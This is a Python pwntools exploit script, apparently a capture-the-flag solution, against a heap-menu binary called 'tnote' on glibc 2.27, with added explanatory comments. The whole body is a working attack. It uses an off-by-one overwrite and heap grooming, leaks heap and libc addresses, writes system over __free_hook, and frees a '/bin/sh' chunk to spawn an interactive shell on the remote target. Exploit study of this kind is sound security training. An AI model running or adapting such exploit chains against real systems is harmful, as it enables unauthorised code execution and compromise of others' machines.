| import sys import os from pwn import *
# Module-level target configuration shared by pwn() and the __main__ guard.
binary = "./tnote"          # local challenge binary, parsed once into `elf`
ip = "**.**.**.**"          # remote host; redacted in this listing
port = 10000
elf = ELF(binary)


def pwn(ip, port, debug):
    """Drive the `tnote` menu over a pwntools tube, then hand it to the user.

    Args:
        ip: remote host, used only when ``debug != 1``.
        port: remote port, used only when ``debug != 1``.
        debug: ``1`` runs `binary` as a local process and takes libc from
            it; any other value connects to ``ip:port`` and loads
            ``libc-2.27.so`` from the current directory.

    The body is a fixed, order-dependent sequence of menu operations that
    assumes the heap behaviour of the target's glibc 2.27 build; it is not
    meaningful to reorder or restyle. Note that it mixes ``str`` literals
    with ``p8``/``p64`` results (e.g. the first payload), which only
    type-checks under Python 2 pwntools.
    """
    # Tube and libc selection. `lib` is the ELF whose symbols are resolved
    # (after rebasing) in the final stage.
    if debug == 1:
        sh = process(binary)
        lib = elf.libc
    else:
        sh = remote(ip, port)
        lib = ELF("libc-2.27.so")
    # I/O shorthands over the tube. Only sa, sla, r, ru, irt and uu64 are
    # used below; s, sl, uu32 and lg are defined but never called here.
    # r/ru use a 5 s timeout; uu64 zero-pads a short read to 8 bytes so a
    # 6-byte little-endian pointer can be unpacked.
    s = lambda data :sh.send(str(data))
    sa = lambda delim,data :sh.sendafter(str(delim), str(data))
    sl = lambda data :sh.sendline(str(data))
    sla = lambda delim,data :sh.sendlineafter(str(delim), str(data))
    r = lambda numb=4096 :sh.recv(numb,timeout=5)
    ru = lambda delims, drop=True :sh.recvuntil(delims, drop,timeout=5)
    irt = lambda :sh.interactive()
    uu32 = lambda data :u32(data.ljust(4, b'\x00'))
    uu64 = lambda data :u64(data.ljust(8, b'\x00'))
    lg = lambda data :log.success(data)

    # Menu wrappers: each waits for the prompt delimiter, then sends the menu
    # letter and its argument. A/D/E/S are presumably the target's
    # add/delete/edit/show commands (the menu text itself is not visible
    # here). `edit` sends `content` raw via sendafter, so callers append the
    # "\n" themselves where one is wanted.
    def add(size):
        sla(":","A"); sla("?",str(size));

    def free(idx):
        sla(":","D"); sla("?",str(idx))

    def edit(idx,content):
        sla(":","E")
        sla("?",str(idx))
        sa(":",content)

    def show(idx):
        sla(":","S")
        sla("?",str(idx))

    # --- Stage 1: heap grooming. Indices used below assume notes are
    # numbered in allocation order — TODO(review): confirm against the binary.
    add(0x18)
    add(0x18)
    add(0x58)
    add(0x18)
    add(0x78)
    # 0x18 filler bytes plus one extra byte (0x81) through a 0x18-byte note:
    # one byte more than requested. Presumably the off-by-one the target
    # permits; where that byte lands depends on the heap layout, which this
    # file does not show.
    payload = "\x11" * 0x18 + p8(0x81)
    edit(0,payload)
    free(1)
    add(0x78)
    free(4)
    payload = "\x11" * 0x18 + p64(0x81) + "\n"
    edit(1,payload)
    free(2)
    # Marker value written so the echoed content can be skipped precisely.
    payload = "\x11" * 0x18 + p64(0xdeadbeefdeadbeef) + "\n"
    edit(1,payload)
    show(1)
    # --- Stage 2: heap leak. Drop everything up to and including the marker,
    # then read the 6 bytes that follow as a pointer. 0x320 is the
    # target-specific distance from that pointer to the heap start —
    # TODO(review): confirm.
    ru("\x11" * 0x18 + p64(0xdeadbeefdeadbeef))
    heap_base = uu64(r(6)) - 0x320
    payload = "\x11" * 0x18 + p64(0x81)
    payload += p64(heap_base + 0x10) + "\n"
    edit(1,payload)
    add(0x78)
    add(0x78)
    # 0x78-byte note: 4 zero qwords, a marker qword, 9 zero qwords, then a
    # heap pointer as the final qword. The same 14-qword prefix is reused in
    # Stage 3 with a different final pointer.
    payload = p64(0) * 4 + p64(0x0f0f0f0f0f0f0f0f) + p64(0) * 9 + p64(heap_base + 0x10) + "\n"
    edit(4,payload)
    free(4)
    add(0x78)
    show(4)
    # --- Stage 3: libc leak and rebase. The 6 bytes after "content:" are
    # taken as a pointer into main_arena. The arithmetic assumes the leak is
    # &main_arena + 96 and that main_arena sits 0x10 past __malloc_hook in
    # this libc build — TODO(review): confirm for the libc actually in use.
    ru("content:")
    main_arena = uu64(r(6))
    success("main_arena = "+hex(main_arena))
    libc = main_arena - lib.symbols[b'__malloc_hook'] - 96 - 0x10
    success("libc = "+hex(libc))
    # Setting ELF.address rebases `lib`, so symbols[] below are absolute.
    lib.address = libc
    system = lib.symbols[b'system']
    __free_hook = lib.symbols[b'__free_hook']
    success("libc_base = "+hex(libc))   # same value as "libc =" above
    success("sys_addr = "+hex(system))
    # --- Stage 4: the final qword now points 8 bytes before __free_hook, so
    # the next 0x78 note is placed such that its first 8 bytes ("/bin/sh\x00")
    # precede the hook and p64(system) lands on the hook itself; free(5) then
    # invokes the hook. Defensive note: __free_hook/__malloc_hook were removed
    # in glibc 2.34, so this final step does not exist on current libcs.
    payload = p64(0) * 4 + p64(0x0f0f0f0f0f0f0f0f) + p64(0) * 9 + p64(__free_hook - 8) + "\n"
    edit(4,payload)
    add(0x78)
    edit(5,"/bin/sh\x00" + p64(system) + "\n")
    free(5)
    irt()
# Script entry point. debug=0 selects pwn()'s non-debug branch: connect to
# the module-level ip:port and load libc-2.27.so from the current directory.
if __name__ == '__main__': pwn(ip, port, 0)